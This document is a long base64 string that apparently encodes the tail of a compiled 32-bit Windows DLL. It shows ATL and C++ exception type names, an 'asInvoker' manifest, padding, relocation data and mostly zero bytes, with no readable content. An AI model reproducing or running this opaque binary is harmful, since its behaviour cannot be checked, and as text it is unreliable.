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JzleOWg5gDq9Osc63zoIOzw7azsWPSY9hT2xPc096T0BPhg+NT5EPlM+Yz53PpQ+zj7lPh0/kD8AAADgAAAwAAAAjDDgMJkxsTG2MR80PzSJNJY0qTRxNZc2kDfZN3U59DoMPjM+QD4AAADwAABIAAAAPjCUMfsxOzJ7Mqoy4jIKMzozajPLMws0QjRdNGc0cTR+NIM0iTSNNJI0mDSlNKo0tDTBNMU0yjTUNN406TTtNAAAAQDwAAAAjDGQMZQxoDGkMagxrDG4Mbwx/DEAMggyDDIQMhQyGDJIOUw5UDlUOVg5XDlgOWQ5aDlsOXA5dDl4OXw5gDmEOYg5jDmQOZQ5mDmcOaA5pDmoOaw5sDm0Obg5vDnAOcQ5yDnMOdA51DnYOdw54DnkOeg57DnwOfQ5+Dn8OQA6BDoIOgw6EDoUOhg6HDogOiQ6KDosOjA6NDo4Ojw6QDpEOkg6TDpQOlQ6WDpcOmA6ZDpoOmw6cDp0Ong6fDqAOoQ6iDqMOpA6lDqYOpw6oDqkOqg6rDqwOrQ6uDq8OsA6xDrMOtA61DoAAAAQAQAgAAAAsDu0O7g7vDvAO8Q7yDvMO9A71DvYOwAAACABAGQAAADQPNQ82DzcPCw9MD2oPaw9vD3APcg94D3wPfQ9BD4IPgw+FD4sPjA+SD5YPlw+cD50PoQ+iD6YPpw+oD6oPsA+PD9AP2A/gD+IP5A/mD+cP6Q/uD/AP9Q/8D8AAAAwAQC8AAAAEDAwMFAwXDB4MIQwoDC8MMAw4DD8MAAxIDFAMWAxgDGgMcAx3DHgMfwxADIcMiAyQDJcMmAygDKgMsAy4DLsMggzKDNIM2QzaDNwM4wznDOkM7Az0DPcM/wzCDQoNDQ0VDRcNGg0iDSUNLQ0wDTgNOw0DDUUNRw1JDUwNVA1XDV8NYQ1kDXINdA11DXsNfA1ADYkNjA2ODZoNnA2dDaMNpA2rDawNrg2wDbINsw21DboNgAAAFABAPwAAAAAMAQwoDGwMbQx0DEYNhA3eDeIN5g3qDe4N9w36DfsN/A39Df4NwA4BDgQOJA5lDmYOaA5pDmoOaw5sDm0Obg5vDnAOcQ5yDnMOdA51DnYOdw54DnkOeg57DnwOfQ5+Dn8OQA6BDoIOgw6EDoUOhg6HDogOiQ6KDosOjA6NDo4Ojw6QDpEOkg6WDpgOmQ6aDpsOnA6dDp4Onw6gDqEOpA6oDqoOiA9JD0oPSw9MD00PTg9PD1APUQ9SD1MPVQ9XD1kPWw9dD18PYQ9jD2UPZw9pD2sPbQ9vD3EPcw91D3cPeQ97D30Pfw9BD6wPrQ+YD+AP4Q/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA